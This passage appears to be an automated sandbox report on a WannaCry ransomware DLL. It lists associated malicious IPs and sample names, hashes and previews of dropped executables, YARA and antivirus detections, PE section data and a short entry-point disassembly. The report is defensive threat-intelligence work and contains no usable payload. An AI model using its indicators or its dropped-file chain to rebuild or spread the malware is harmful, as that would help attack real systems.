                                                                                          • 48.139.41.128
                                                                                          bo74pgWMOj.elfGet hashmaliciousBrowse
                                                                                          • 34.151.41.172
                                                                                          6GqmJDM3D3.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          5TDxOyjy7f.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          zCH4NBSNM7.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          z1vhWwKVFd.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          T2A1Ylef4j.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          XXD0lypZXj.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 34.142.181.181
                                                                                          ATT-INTERNET4USmbXvGlj2dR.dllGet hashmaliciousBrowse
                                                                                          • 70.230.227.11
                                                                                          3AnYui60gb.elfGet hashmaliciousBrowse
                                                                                          • 13.189.59.0
                                                                                          gL5vZH3AvK.elfGet hashmaliciousBrowse
                                                                                          • 107.114.210.16
                                                                                          heCWccXzMA.elfGet hashmaliciousBrowse
                                                                                          • 208.188.164.7
                                                                                          0saGL1a1U6.elfGet hashmaliciousBrowse
                                                                                          • 12.77.92.230
                                                                                          7RNOs54rNa.elfGet hashmaliciousBrowse
                                                                                          • 13.129.19.113
                                                                                          OHjeOA7E8A.elfGet hashmaliciousBrowse
                                                                                          • 99.179.11.225
                                                                                          4t5dine8c7.elfGet hashmaliciousBrowse
                                                                                          • 107.195.173.217
                                                                                          gXjp7HgNea.elfGet hashmaliciousBrowse
                                                                                          • 75.58.31.55
                                                                                          RqeX2d4Zoo.elfGet hashmaliciousBrowse
                                                                                          • 99.173.53.84
                                                                                          a5Awf2XPmL.elfGet hashmaliciousBrowse
                                                                                          • 23.112.81.155
                                                                                          bAbNapBrPT.elfGet hashmaliciousBrowse
                                                                                          • 172.12.156.168
                                                                                          eaJ6Y5hf9O.elfGet hashmaliciousBrowse
                                                                                          • 157.234.198.217
                                                                                          https://www.5mno3.com/scripts/un981c6l?a_aid=e1b43ef7&a_bid=e4af19a5&data1=%E5%BB%A3%E6%9D%B1%E8%A9%B1+%E5%A5%91%E5%BC%9F&data2=9kd4h95jvq71Get hashmaliciousBrowse
                                                                                          • 13.32.27.120
                                                                                          mPQQqzukqh.elfGet hashmaliciousBrowse
                                                                                          • 172.138.155.168
                                                                                          VAjvBiGvo8.elfGet hashmaliciousBrowse
                                                                                          • 13.145.249.167
                                                                                          Drql8qB4Ra.elfGet hashmaliciousBrowse
                                                                                          • 12.105.115.10
                                                                                          bo74pgWMOj.elfGet hashmaliciousBrowse
                                                                                          • 32.118.204.146
                                                                                          L1Ei328F7y.elfGet hashmaliciousBrowse
                                                                                          • 99.40.23.171
                                                                                          jr7Vd9THho.elfGet hashmaliciousBrowse
                                                                                          • 107.245.3.147
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          bd0bf25947d4a37404f0424edf4db9adfile.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          B2fZjTRiGb.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          B2fZjTRiGb.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          79mACEvEl7.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          6OQMGK0aHZ.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          39p20D8IvI.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          48EeCRtIvV.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          v4VVmZyfzp.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          4UHRfjEWX7.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          j4KHFcA1QU.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          5Pzvhfd12N.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          mAJSpM3Psq.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          SecuriteInfo.com.W32.Trojan.SW.gen.Eldorado.12443.21800.exeGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          ViNIRfmQmE.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          qjiXBMIlZj.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          QdyYAjhCjU.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          QdyYAjhCjU.dllGet hashmaliciousBrowse
                                                                                          • 23.211.4.90
                                                                                          10ee8d30a5d01c042afd7b2b205facc4IU28r0EZFA.dllGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          file.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          B2fZjTRiGb.dllGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          79mACEvEl7.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          K0jImkttvV.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          v4VVmZyfzp.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          rPI4hRMguh.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          5Pzvhfd12N.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          f4cUxRirn2.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          mAJSpM3Psq.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          ViNIRfmQmE.dllGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          QdyYAjhCjU.dllGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          kN2n1bKMW4.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          http://iyfnz.com/?dn=smartstore-net.de&pid=9PO755G95Get hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          Consulta por pedido.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          BNK0002334269532_USD28,770.00.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          http://youtubeoutube.com/Get hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          0JWwctdzmQ.dllGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          PqqGUSe5cR.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          FFiVkDVGeZ.exeGet hashmaliciousBrowse
                                                                                          • 204.79.197.200
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          C:\Windows\eee.exer2gAjMU8hM.dllGet hashmaliciousBrowse
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2494
                                                                                            Entropy (8bit):5.2355024803635395
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cAn/TLtfGgzmQLeUp/B8HSBSkC9+TyuKVss:pTLtf9zmQ6kA7+s
                                                                                            MD5:D0EDA25D494B0F84F09663CA3110F678
                                                                                            SHA1:D824ACAA9203BE050E37A5BB6C6EE4944B973084
                                                                                            SHA-256:E292809B8816743FF887D1E094B80B24B80BDF20F5275C89F6762C4292F89D26
                                                                                            SHA-512:4B657AEF17EA6BE105DB447E12D018830B6E8DD74AA0052187A2813E2DCF3CACF4833130379CFEAB32DD6AC0A750F2832A4F025D8A34E045BF7285FF47BA2C18
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051593686244000</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):2494
                                                                                            Entropy (8bit):5.2355024803635395
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cAn/TLtfGgzmQLeUp/B8HSBSkC9+TyuKVss:pTLtf9zmQ6kA7+s
                                                                                            MD5:D0EDA25D494B0F84F09663CA3110F678
                                                                                            SHA1:D824ACAA9203BE050E37A5BB6C6EE4944B973084
                                                                                            SHA-256:E292809B8816743FF887D1E094B80B24B80BDF20F5275C89F6762C4292F89D26
                                                                                            SHA-512:4B657AEF17EA6BE105DB447E12D018830B6E8DD74AA0052187A2813E2DCF3CACF4833130379CFEAB32DD6AC0A750F2832A4F025D8A34E045BF7285FF47BA2C18
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051593686244000</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu
                                                                                            Process:C:\Windows\mssecsvr.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):2061938
                                                                                            Entropy (8bit):7.964410042247033
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:XENbcBVQej/1INRx+TSqTdX1HkQo6SAARdhnvm:X+oBhz1aRxcSUDk36SAEdhvm
                                                                                            MD5:06773C385B9F9A55B70067ED1D5739DE
                                                                                            SHA1:3E65F2C71708E103E7036A2F877EBCC88063C67B
                                                                                            SHA-256:486A1DA92D0A86066DE7714104451C10051432C6EB357B7CD04125B685F43F63
                                                                                            SHA-512:AE728EB69C5DA7208A240E50D99FFBDE0282EBF8291D130E3417357074DC1EFA3C397E9F4AE2E7B20FF05FA9E7353CFC76167234FCC21A223A34B30701ACC075
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 90%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&K.WG%.WG%.WG%.^?..LG%.^?...G%.^?..BG%.WG$.G%.^?..0G%.^?..VG%.^?..VG%.^?..VG%.RichWG%.................PE..L......U..........................................@..........................`......................................p...3............ ..(9..............................................................@............................................text.............................. ..`.rdata...P.......R..................@..@.data...(...........................@....rsrc...(9... ...:..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):8192
                                                                                            Entropy (8bit):2.742516872382959
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:t2eUlq0Ulq0j000U0U9BD0ClPr0w0P0109O:9ENMNg/fyC2YbsC4
                                                                                            MD5:7C641FAE8B559EBF51F8E427DA50BF8E
                                                                                            SHA1:19BB80F75096D0D43215B5EBF1F84CC2C532D002
                                                                                            SHA-256:18A58F5F1F4A474FD28CA72580BBC4732C353279DEA1B74FC2C826DB8F85FF3E
                                                                                            SHA-512:681BB11F317906371FCC6632489FEFBF4FE26A5DC1E6BC42A4FBB902DF0D353320E9646B4E7587760989C27ED165C7AB89F2E05D28B8BDDF22BB0207872C6E62
                                                                                            Malicious:false
                                                                                            Preview:....................................................!............................................................B......$.D./...Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... ......Vt./...........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.1.2.2.2._.1.8.0.4.3.5._.1.4.2...e.t.l.............P.P.............................................................................9.B.........17134.1.amd64fre.rs4_release.180410-1804............5.@.........OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):10874
                                                                                            Entropy (8bit):3.164224827641664
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJJ+e:j+s+v+b+P+m+0+Q+q+q+73+zX+e
                                                                                            MD5:6DCBA5EE41AD6E1E9A0786560F585072
                                                                                            SHA1:6E0693DF192542F2838D0B4E18CC5F8BC2726E2B
                                                                                            SHA-256:89B768320A62922021C299ACD3F43203BB29DE38AF5F3B73F2E871472225BFC2
                                                                                            SHA-512:1C1916FA685E09755410209352EF2F8B073CC9EDC8C9A7AB507E1A619A48C6FF2ED634D569220941CB6962F35AE0ADDA04278E8F2725B50FE74487F91031ABA2
                                                                                            Malicious:false
                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                            Process:C:\Windows\tasksche.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1981503
                                                                                            Entropy (8bit):0.38424875875863396
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:2BBHFOA2zoXR5WrrTKMb5D1teJxkrc12hFoDTkN04ARNEMZQZlkayb6SoGC28jjO:23NiTmJurc+iCQNEMZUGakhcjcJdyVu
                                                                                            MD5:1C25F6BB95D52132CEEE2ED6D4DA43D7
                                                                                            SHA1:2BA8D778FCCC55CEEFCA6016A8BA89E6078571B3
                                                                                            SHA-256:95EF1D077176B0DE86FB8BA7BF2AE56A08BF7944B05424A2F6E013ACDF5FD684
                                                                                            SHA-512:BBCA81786BCB8F8DABD1A67D9EEC40D1431385A663EBD30813851905117FA7E67F6B130CBFDB094FED976CD4F22FEADC30E75EBFED0CF4F5C21D30182579D130
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: r2gAjMU8hM.dll, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..`_Z.`_Z.`_Z...Z.`_Z...Z1`_Z...Z.`_Z.>\[.`_Z.>[[.`_Z.>Z[.`_Z...Z.`_Z...Z.`_Z.`^Z@`_Z->Z[.`_Z->_[.`_Z(>.Z.`_Z->][.`_ZRich.`_Z........PE..L......Y..........................................@.......................... ............@.........................@...4...t...(........:......................X...Pn..T...............................@...................... ....................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc....F.......H..................@..@.reloc..X........ ..................@..B........................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2281472
                                                                                            Entropy (8bit):7.890796243728023
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:QnpENbcBVQej/1INRx+TSqTdX1HkQo6SAARdhnvn:Qp+oBhz1aRxcSUDk36SAEdhvn
                                                                                            MD5:06F05FA7206B546118253C33D60541DC
                                                                                            SHA1:B27F9DC8394423C38591367A87827B5E51D31719
                                                                                            SHA-256:528EA2825F49B83A9D2774233E46CE145F09C1C2DAF1CB0FA251D406C38BC851
                                                                                            SHA-512:DF5E762182346F090CA912C8A5149AD08C47ADDD57BF453A0B88B052D1DEEB0024EFC1AF680C6E8B024C24A3D2A1DC8E375EEBC3AA16E4B87346D5DE2C0A87D3
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvr.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                            • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvr.exe, Author: Florian Roth (based on rule by US CERT)
                                                                                            • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvr.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 98%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L.....L......................"...................@...........................P......................................................1..z...........................................................................................................text.............................. ..`.rdata..............................@..@.data....H0......p..................@....rsrc.........1...... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\mssecsvr.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):2061938
                                                                                            Entropy (8bit):7.964410042247033
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:XENbcBVQej/1INRx+TSqTdX1HkQo6SAARdhnvm:X+oBhz1aRxcSUDk36SAEdhvm
                                                                                            MD5:06773C385B9F9A55B70067ED1D5739DE
                                                                                            SHA1:3E65F2C71708E103E7036A2F877EBCC88063C67B
                                                                                            SHA-256:486A1DA92D0A86066DE7714104451C10051432C6EB357B7CD04125B685F43F63
                                                                                            SHA-512:AE728EB69C5DA7208A240E50D99FFBDE0282EBF8291D130E3417357074DC1EFA3C397E9F4AE2E7B20FF05FA9E7353CFC76167234FCC21A223A34B30701ACC075
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 90%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&K.WG%.WG%.WG%.^?..LG%.^?...G%.^?..BG%.WG$.G%.^?..0G%.^?..VG%.^?..VG%.^?..VG%.RichWG%.................PE..L......U..........................................@..........................`......................................p...3............ ..(9..............................................................@............................................text.............................. ..`.rdata...P.......R..................@..@.data...(...........................@....rsrc...(9... ...:..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):4.289827988191216
                                                                                            TrID:
                                                                                            • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                                            • Windows Screen Saver (13104/52) 1.29%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                            • DOS Executable Generic (2002/1) 0.20%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:xIwkOnjSIa.dll
                                                                                            File size:5267459
                                                                                            MD5:98df58e71b5202e49ba6f9e6e43ef6ef
                                                                                            SHA1:7ee6e1082c30108ae631c6193878195c1abe7112
                                                                                            SHA256:b5d543c8a8334519f013bb236d43d0561088b52b0d5602ea9b58fc453f2c4156
                                                                                            SHA512:1eba0f2e6f38cf4b53c84926396a0a18f0e524bbea3fc2fcd9326c43a001ae9bfb80556ce07c489dae09b8e4830c89276589cb208f23a5aa78776a01c692520b
                                                                                            SSDEEP:49152:RnpENbcBVQej/1INRx+TSqTdX1HkQo6SAARdhnv:1p+oBhz1aRxcSUDk36SAEdhv
                                                                                            TLSH:5136236530A8C0B4C107157444ABCA62F6B67C3A17FA694FBF904E7E3E63B56E710B42
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......
                                                                                            Icon Hash:74f0e4ecccdce0e4
                                                                                            Entrypoint:0x100011e9
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x10000000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                                            DLL Characteristics:
                                                                                            Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:2e5708ae5fed0403e8117c645fb23e5b
                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push ebx
                                                                                            mov ebx, dword ptr [ebp+08h]
                                                                                            push esi
                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                            push edi
                                                                                            mov edi, dword ptr [ebp+10h]
                                                                                            test esi, esi
                                                                                            jne 00007FF894E71ECBh
                                                                                            cmp dword ptr [10003140h], 00000000h
                                                                                            jmp 00007FF894E71EE8h
                                                                                            cmp esi, 01h
                                                                                            je 00007FF894E71EC7h
                                                                                            cmp esi, 02h
                                                                                            jne 00007FF894E71EE4h
                                                                                            mov eax, dword ptr [10003150h]
                                                                                            test eax, eax
                                                                                            je 00007FF894E71ECBh
                                                                                            push edi
                                                                                            push esi
                                                                                            push ebx
                                                                                            call eax
                                                                                            test eax, eax
                                                                                            je 00007FF894E71ECEh
                                                                                            push edi
                                                                                            push esi
                                                                                            push ebx
                                                                                            call 00007FF894E71DDAh
                                                                                            test eax, eax
                                                                                            jne 00007FF894E71EC6h
                                                                                            xor eax, eax
                                                                                            jmp 00007FF894E71F10h
                                                                                            push edi
                                                                                            push esi
                                                                                            push ebx
                                                                                            call 00007FF894E71C8Ch
                                                                                            cmp esi, 01h
                                                                                            mov dword ptr [ebp+0Ch], eax
                                                                                            jne 00007FF894E71ECEh
                                                                                            test eax, eax
                                                                                            jne 00007FF894E71EF9h
                                                                                            push edi
                                                                                            push eax
                                                                                            push ebx
                                                                                            call 00007FF894E71DB6h
                                                                                            test esi, esi
                                                                                            je 00007FF894E71EC7h
                                                                                            cmp esi, 03h
                                                                                            jne 00007FF894E71EE8h
                                                                                            push edi
                                                                                            push esi
                                                                                            push ebx
                                                                                            call 00007FF894E71DA5h
                                                                                            test eax, eax
                                                                                            jne 00007FF894E71EC5h
                                                                                            and dword ptr [ebp+0Ch], eax
                                                                                            cmp dword ptr [ebp+0Ch], 00000000h
                                                                                            je 00007FF894E71ED3h
                                                                                            mov eax, dword ptr [10003150h]
                                                                                            test eax, eax
                                                                                            je 00007FF894E71ECAh
                                                                                            push edi
                                                                                            push esi
                                                                                            push ebx
                                                                                            call eax
                                                                                            mov dword ptr [ebp+0Ch], eax
                                                                                            mov eax, dword ptr [ebp+0Ch]
                                                                                            pop edi
                                                                                            pop esi
                                                                                            pop ebx
                                                                                            pop ebp
                                                                                            retn 000Ch
                                                                                            jmp dword ptr [10002028h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            Programming Language:
                                                                                            • [ C ] VS98 (6.0) build 8168
                                                                                            • [C++] VS98 (6.0) build 8168
                                                                                            • [RES] VS98 (6.0) cvtres build 1720
                                                                                            • [LNK] VS98 (6.0) imp/exp build 8168
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x21900x48.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x203c0x3c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x500060.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5050000x5c.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x3c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x28c0x1000False0.13037109375data1.4429971244731552IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x20000x1d80x1000False0.072509765625data0.7346018133622799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x30000x1540x1000False0.016845703125Matlab v4 mat-file (little endian) C:\%s\%s, numeric, rows 0, columns 00.085726967663312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x40000x5000600x501000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
